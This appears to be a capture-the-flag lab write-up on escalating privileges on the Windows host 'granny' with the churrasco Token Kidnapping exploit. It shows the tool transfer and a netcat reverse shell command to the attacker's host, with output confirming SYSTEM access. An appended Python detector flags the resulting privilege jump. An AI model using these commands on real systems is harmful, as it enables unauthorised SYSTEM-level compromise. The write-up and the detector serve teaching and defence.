Token Kidnapping


churrasco is a Token Kidnapping exploit: it steals an impersonation token from a higher-privileged service thread (here RPCSS) and uses it to run a command as SYSTEM. It is effective against older systems affected by:

  • CVE-2008-1436
  • CVE-2009-0079
  • and many more

Exploitation


C:\tmp>copy \\10.10.14.2\smb\churrasco.exe .
        1 file(s) copied.
 
C:\tmp>copy \\10.10.14.2\smb\nc.exe .
        1 file(s) copied.

Delivery complete

C:\tmp>churrasco.exe
/churrasco/-->Usage: Churrasco.exe [-d] "command to run"

Netcat will be used for command execution

C:\tmp>churrasco.exe -d "C:\\tmp\\nc.exe 10.10.14.2 1234 -e cmd"
/churrasco/-->Current User: NETWORK SERVICE 
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 672 
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 676 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684 
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!

Launching the exploit

┌──(kali㉿kali)-[~/archive/htb/labs/granny]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1035
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
 
C:\WINDOWS\TEMP> whoami
 whoami
nt authority\system
 
C:\WINDOWS\TEMP> hostname
 hostname
granny
 
C:\WINDOWS\TEMP> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection:
 
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 10.10.10.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2

System Level Compromise
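The tell-tale of the run above is a child process running as SYSTEM whose parent (churrasco.exe) ran as NETWORK SERVICE. The following detection check is an added example, not part of the original writeup; the event fields and sample records are constructed.

```python
"""Detect a SYSTEM child spawned by a lower-privileged service-account parent.

Added example, not part of the original writeup. Token kidnapping, as in the
churrasco run above, ends with a command (nc.exe) running as SYSTEM even
though the process that launched it ran as NETWORK SERVICE. Process-creation
telemetry that records each process's account lets a defender flag that
parent/child privilege jump. Field names and sample data are assumptions.
"""
from dataclasses import dataclass

SERVICE_ACCOUNTS = {r"nt authority\network service", r"nt authority\local service"}
SYSTEM = r"nt authority\system"

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    user: str

def find_token_jumps(events):
    """Return (parent, child) pairs where a service-account process spawned
    a child that runs as SYSTEM; parents are resolved by PID."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for child in events:
        parent = by_pid.get(child.ppid)
        if parent is None:
            continue  # parent not present in this batch of telemetry
        if (child.user.lower() == SYSTEM
                and parent.user.lower() in SERVICE_ACCOUNTS):
            hits.append((parent, child))
    return hits

# Constructed sample telemetry loosely mirroring the run above (PIDs made up).
SAMPLE_EVENTS = [
    ProcEvent(1200, 4, r"C:\WINDOWS\system32\services.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(672, 1200, r"C:\WINDOWS\system32\svchost.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(2544, 1200, r"C:\WINDOWS\system32\inetsrv\w3wp.exe", r"NT AUTHORITY\NETWORK SERVICE"),
    ProcEvent(3000, 2544, r"C:\tmp\churrasco.exe", r"NT AUTHORITY\NETWORK SERVICE"),
    ProcEvent(3012, 3000, r"C:\tmp\nc.exe", r"NT AUTHORITY\SYSTEM"),  # the privilege jump
    ProcEvent(3020, 3012, r"C:\WINDOWS\system32\cmd.exe", r"NT AUTHORITY\SYSTEM"),
]

if __name__ == "__main__":
    for parent, child in find_token_jumps(SAMPLE_EVENTS):
        print(f"{parent.image} ({parent.user}) -> {child.image} ({child.user})")
```

Only the churrasco.exe to nc.exe edge is reported; SYSTEM children of SYSTEM parents (services.exe, nc.exe spawning cmd.exe) are normal and stay quiet. Tune by image path if a legitimate service on the host is known to launch SYSTEM helpers.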